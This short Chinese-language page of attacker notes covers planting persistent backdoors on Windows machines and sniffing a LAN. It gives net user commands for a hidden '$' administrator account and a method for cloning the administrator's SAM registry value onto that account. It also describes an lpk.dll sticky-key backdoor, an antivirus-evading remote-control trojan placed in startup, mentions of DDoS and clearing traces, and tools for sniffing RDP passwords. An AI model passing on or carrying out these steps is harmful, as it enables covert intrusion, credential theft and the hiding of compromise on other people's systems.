windows留後門與局域網抓包

嗅探3389密碼
wireshark
cain

windows安裝後門:
賬號後門:
net user
net user 賬號$ 密碼 /add 加$符變爲隱藏賬號
net localgrop administrators 賬號 /add
net user 賬號 /del 刪除賬號

系統自帶賬號改密碼  記錄名字
regedit   打開註冊表
HKEY_LOCAL_MACHINE->SAM->SAM
右鍵設置權限   刷新   users->name  找到賬號  看類型   上面找到該賬號
先找到管理員(administrator)賬號  雙擊類型爲REG_BINATY第一個  所有數據複製
粘貼進後門賬號
關閉sam文件夾權限

LPK後門:
生成lpk.dll
鍵值爲ascii碼,2鍵同時按下2個鍵,3鍵同時按下三個鍵 生成
exe可執行程序觸發
五次shift,同時按下設置的熱鍵,彈出密碼框,輸入密碼登錄
×××後門:
遠控上線+×××免殺,×××丟進開機啓動項
部分帶壓力測試遠控可進行DDOS×××
windows清理痕跡可下載清理工具
允許外連:
***工具:navicat premium essentials
不允許外連:
***腳本

信息蒐集:
nmap
zenmap
scanport
ntscan
arp -a
net view 查看其它電腦主機名
查看ip:
ipconfig

getpass

流量監聽:
wiresharke
cain
sniffer pass

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章